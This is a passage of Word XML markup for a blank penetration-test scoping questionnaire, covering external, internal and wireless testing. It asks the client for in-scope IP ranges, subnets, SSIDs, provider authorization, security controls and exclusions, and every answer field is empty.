          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6928C02F" w14:textId="77777777" w:rsidR="00112BBC" w:rsidRDefault="00112BBC" w:rsidP="00EA00E3">
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00112BBC" w14:paraId="6F7AD542" w14:textId="77777777" w:rsidTr="00EA00E3">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4F9B2D2A" w14:textId="77777777" w:rsidR="00112BBC" w:rsidRDefault="00112BBC" w:rsidP="00EA00E3">
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t>List the external IP ranges in scope for testing.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0F209182" w14:textId="77777777" w:rsidR="00112BBC" w:rsidRDefault="00112BBC" w:rsidP="00EA00E3">
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00112BBC" w14:paraId="68F134AD" w14:textId="77777777" w:rsidTr="00EA00E3">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5654252F" w14:textId="77777777" w:rsidR="00112BBC" w:rsidRDefault="00112BBC" w:rsidP="00EA00E3">
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t>Are all systems being tested located within a client managed network?</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="75235E9A" w14:textId="77777777" w:rsidR="00112BBC" w:rsidRDefault="00112BBC" w:rsidP="00EA00E3">
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00112BBC" w14:paraId="796D0352" w14:textId="77777777" w:rsidTr="00EA00E3">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="087EBF12" w14:textId="77777777" w:rsidR="00112BBC" w:rsidRDefault="00112BBC" w:rsidP="00EA00E3">
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t>Are perimeter/edge security controls configured to block known scans and attacks?</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0174D070" w14:textId="77777777" w:rsidR="00112BBC" w:rsidRDefault="00112BBC" w:rsidP="00EA00E3">
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00112BBC" w14:paraId="61FAFC93" w14:textId="77777777" w:rsidTr="00EA00E3">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="66254830" w14:textId="77777777" w:rsidR="00112BBC" w:rsidRDefault="00112BBC" w:rsidP="00EA00E3">
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t>If “YES” to the above, will these controls be temporarily altered to fully test the target systems?</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3F4F584B" w14:textId="77777777" w:rsidR="00112BBC" w:rsidRDefault="00112BBC" w:rsidP="00EA00E3">
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00112BBC" w14:paraId="2C5E5519" w14:textId="77777777" w:rsidTr="00EA00E3">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="74B8909B" w14:textId="77777777" w:rsidR="00112BBC" w:rsidRDefault="00112BBC" w:rsidP="00EA00E3">
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t>Is any target to be excluded? If so, please list targets and provide reasoning for exclusion.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="67907827" w14:textId="77777777" w:rsidR="00112BBC" w:rsidRDefault="00112BBC" w:rsidP="00EA00E3">
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="39F36D42" w14:textId="77777777" w:rsidR="00112BBC" w:rsidRPr="003D4623" w:rsidRDefault="00112BBC" w:rsidP="00112BBC">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="59" w:name="nva---internal"/>
      <w:bookmarkEnd w:id="58"/>
      <w:r w:rsidRPr="003D4623">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>NVA - Internal</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table"/>
        <w:tblW w:w="5000" w:type="pct"/>
        <w:tblBorders>
          <w:insideH w:val="single" w:sz="4" w:space="0" w:color="auto"/>
          <w:insideV w:val="single" w:sz="4" w:space="0" w:color="auto"/>
        </w:tblBorders>
        <w:tblLook w:val="0020" w:firstRow="1" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:noHBand="0" w:noVBand="0"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="8355"/>
        <w:gridCol w:w="1005"/>
      </w:tblGrid>
      <w:tr w:rsidR="00112BBC" w14:paraId="0F520AF2" w14:textId="77777777" w:rsidTr="00EA00E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4AB35A43" w14:textId="77777777" w:rsidR="00112BBC" w:rsidRDefault="00112BBC" w:rsidP="00EA00E3">
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t>Question</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:tcBorders>
              <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="5D9A9BA6" w14:textId="77777777" w:rsidR="00112BBC" w:rsidRDefault="00112BBC" w:rsidP="00EA00E3">
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t>Answer</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00112BBC" w14:paraId="4E92D630" w14:textId="77777777" w:rsidTr="00EA00E3">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="597A9F02" w14:textId="77777777" w:rsidR="00112BBC" w:rsidRDefault="00112BBC" w:rsidP="00EA00E3">
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t>Information required for the Network (internal) penetration test</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5032F94D" w14:textId="77777777" w:rsidR="00112BBC" w:rsidRDefault="00112BBC" w:rsidP="00EA00E3">
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00112BBC" w14:paraId="186F00B8" w14:textId="77777777" w:rsidTr="00EA00E3">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="722FD9C2" w14:textId="77777777" w:rsidR="00112BBC" w:rsidRDefault="00112BBC" w:rsidP="00EA00E3">
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t>List the internal network subnets in scope for testing.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="30C1DE04" w14:textId="77777777" w:rsidR="00112BBC" w:rsidRDefault="00112BBC" w:rsidP="00EA00E3">
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00112BBC" w14:paraId="3F258FA2" w14:textId="77777777" w:rsidTr="00EA00E3">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="757B4E55" w14:textId="77777777" w:rsidR="00112BBC" w:rsidRDefault="00112BBC" w:rsidP="00EA00E3">
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t>If systems are hosted outside the client managed network, please specify which /hosting/cloud provider hosts these systems.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="16791BA0" w14:textId="77777777" w:rsidR="00112BBC" w:rsidRDefault="00112BBC" w:rsidP="00EA00E3">
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00112BBC" w14:paraId="0BE68E1D" w14:textId="77777777" w:rsidTr="00EA00E3">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1F0410C5" w14:textId="77777777" w:rsidR="00112BBC" w:rsidRDefault="00112BBC" w:rsidP="00EA00E3">
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t>Have you received authorization for testing from provider?</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7A042403" w14:textId="77777777" w:rsidR="00112BBC" w:rsidRDefault="00112BBC" w:rsidP="00EA00E3">
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00112BBC" w14:paraId="3ADECE4C" w14:textId="77777777" w:rsidTr="00EA00E3">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="26E6AE4D" w14:textId="77777777" w:rsidR="00112BBC" w:rsidRDefault="00112BBC" w:rsidP="00EA00E3">
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:lastRenderedPageBreak/>
              <w:t>How many internal IP addresses are in scope for testing?</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7AB9898D" w14:textId="77777777" w:rsidR="00112BBC" w:rsidRDefault="00112BBC" w:rsidP="00EA00E3">
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00112BBC" w14:paraId="70AD6C54" w14:textId="77777777" w:rsidTr="00EA00E3">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="109D1EFE" w14:textId="77777777" w:rsidR="00112BBC" w:rsidRDefault="00112BBC" w:rsidP="00EA00E3">
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t>List the internal IP addresses in scope for testing.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="76BAA088" w14:textId="77777777" w:rsidR="00112BBC" w:rsidRDefault="00112BBC" w:rsidP="00EA00E3">
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00112BBC" w14:paraId="0006F3D4" w14:textId="77777777" w:rsidTr="00EA00E3">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4821B426" w14:textId="77777777" w:rsidR="00112BBC" w:rsidRDefault="00112BBC" w:rsidP="00EA00E3">
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t>Are internal network security controls configured to block known scans and attacks?</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5008E35B" w14:textId="77777777" w:rsidR="00112BBC" w:rsidRDefault="00112BBC" w:rsidP="00EA00E3">
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00112BBC" w14:paraId="10216C88" w14:textId="77777777" w:rsidTr="00EA00E3">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="25C4B05C" w14:textId="77777777" w:rsidR="00112BBC" w:rsidRDefault="00112BBC" w:rsidP="00EA00E3">
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t>If “YES” to the above, will these controls be temporarily altered to fully test the target systems? Note: It is recommended to fully test in scope systems on the internal network(s).</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="05AE7093" w14:textId="77777777" w:rsidR="00112BBC" w:rsidRDefault="00112BBC" w:rsidP="00EA00E3">
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00112BBC" w14:paraId="2E55FE88" w14:textId="77777777" w:rsidTr="00EA00E3">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6D4D4890" w14:textId="77777777" w:rsidR="00112BBC" w:rsidRDefault="00112BBC" w:rsidP="00EA00E3">
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t>Are any targets to be excluded? If so, please list targets and provide reasoning for exclusion.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="48E5AE21" w14:textId="77777777" w:rsidR="00112BBC" w:rsidRDefault="00112BBC" w:rsidP="00EA00E3">
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="34127961" w14:textId="77777777" w:rsidR="00112BBC" w:rsidRPr="003D4623" w:rsidRDefault="00112BBC" w:rsidP="00112BBC">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="60" w:name="wireless"/>
      <w:bookmarkEnd w:id="59"/>
      <w:r w:rsidRPr="003D4623">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>Wireless</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table"/>
        <w:tblW w:w="5000" w:type="pct"/>
        <w:tblLook w:val="0020" w:firstRow="1" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:noHBand="0" w:noVBand="0"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="8355"/>
        <w:gridCol w:w="1005"/>
      </w:tblGrid>
      <w:tr w:rsidR="00112BBC" w14:paraId="7023148A" w14:textId="77777777" w:rsidTr="00EA00E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single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="43C74D23" w14:textId="77777777" w:rsidR="00112BBC" w:rsidRDefault="00112BBC" w:rsidP="00EA00E3">
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t>Question</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="4FE71BD2" w14:textId="77777777" w:rsidR="00112BBC" w:rsidRDefault="00112BBC" w:rsidP="00EA00E3">
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t>Answer</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00112BBC" w14:paraId="28E2C6EC" w14:textId="77777777" w:rsidTr="00EA00E3">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="0CD7D664" w14:textId="77777777" w:rsidR="00112BBC" w:rsidRDefault="00112BBC" w:rsidP="00EA00E3">
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t>Information required for the Network (wireless) penetration test</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="4F486F4D" w14:textId="77777777" w:rsidR="00112BBC" w:rsidRDefault="00112BBC" w:rsidP="00EA00E3">
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00112BBC" w14:paraId="73F4A941" w14:textId="77777777" w:rsidTr="00EA00E3">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="1EF61F6E" w14:textId="77777777" w:rsidR="00112BBC" w:rsidRDefault="00112BBC" w:rsidP="00EA00E3">
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t>At how many locations is wireless testing performed?</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="632094AD" w14:textId="77777777" w:rsidR="00112BBC" w:rsidRDefault="00112BBC" w:rsidP="00EA00E3">
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00112BBC" w14:paraId="77030381" w14:textId="77777777" w:rsidTr="00EA00E3">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="0C0E1ED9" w14:textId="77777777" w:rsidR="00112BBC" w:rsidRDefault="00112BBC" w:rsidP="00EA00E3">
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t>Please provide the physical addresses of the facilities in scope for wireless security testing.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="14C2249B" w14:textId="77777777" w:rsidR="00112BBC" w:rsidRDefault="00112BBC" w:rsidP="00EA00E3">
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00112BBC" w14:paraId="332A6110" w14:textId="77777777" w:rsidTr="00EA00E3">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="49AA6AB7" w14:textId="77777777" w:rsidR="00112BBC" w:rsidRDefault="00112BBC" w:rsidP="00EA00E3">
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t>Please provide the approved SSIDs for the company’s wireless access points.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="29CCDC41" w14:textId="77777777" w:rsidR="00112BBC" w:rsidRDefault="00112BBC" w:rsidP="00EA00E3">
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00112BBC" w14:paraId="6B7C9FF2" w14:textId="77777777" w:rsidTr="00EA00E3">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="7BDA662B" w14:textId="77777777" w:rsidR="00112BBC" w:rsidRDefault="00112BBC" w:rsidP="00EA00E3">
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t>Does the guest network require authentication?</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="048E8B24" w14:textId="77777777" w:rsidR="00112BBC" w:rsidRDefault="00112BBC" w:rsidP="00EA00E3">
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00112BBC" w14:paraId="4975F7D3" w14:textId="77777777" w:rsidTr="00EA00E3">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="2710E5C6" w14:textId="77777777" w:rsidR="00112BBC" w:rsidRDefault="00112BBC" w:rsidP="00EA00E3">
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t>Technologies in use? WPA, WPA2-PSK or EAP? Are all accessible over 2.4GHZ or some 5GHz?</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="4E4BB545" w14:textId="77777777" w:rsidR="00112BBC" w:rsidRDefault="00112BBC" w:rsidP="00EA00E3">
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00112BBC" w14:paraId="313CF527" w14:textId="77777777" w:rsidTr="00EA00E3">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="4DB138BC" w14:textId="77777777" w:rsidR="00112BBC" w:rsidRDefault="00112BBC" w:rsidP="00EA00E3">
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t>Is there any Wireless Intrusion Prevention Systems, Network Access Control (NAC) or Rogue AP detection in use?</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="22DA7165" w14:textId="77777777" w:rsidR="00112BBC" w:rsidRDefault="00112BBC" w:rsidP="00EA00E3">
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00112BBC" w14:paraId="35D3741B" w14:textId="77777777" w:rsidTr="00EA00E3">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="0A959B42" w14:textId="77777777" w:rsidR="00112BBC" w:rsidRDefault="00112BBC" w:rsidP="00EA00E3">
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t>Are any SSIDs/wireless access points to be excluded? If so, please list here and provide reasoning for exclusion.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="2871EE65" w14:textId="77777777" w:rsidR="00112BBC" w:rsidRDefault="00112BBC" w:rsidP="00EA00E3">
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00112BBC" w14:paraId="20234C84" w14:textId="77777777" w:rsidTr="00EA00E3">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0C19FA5E" w14:textId="77777777" w:rsidR="00112BBC" w:rsidRDefault="00112BBC" w:rsidP="00EA00E3">
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
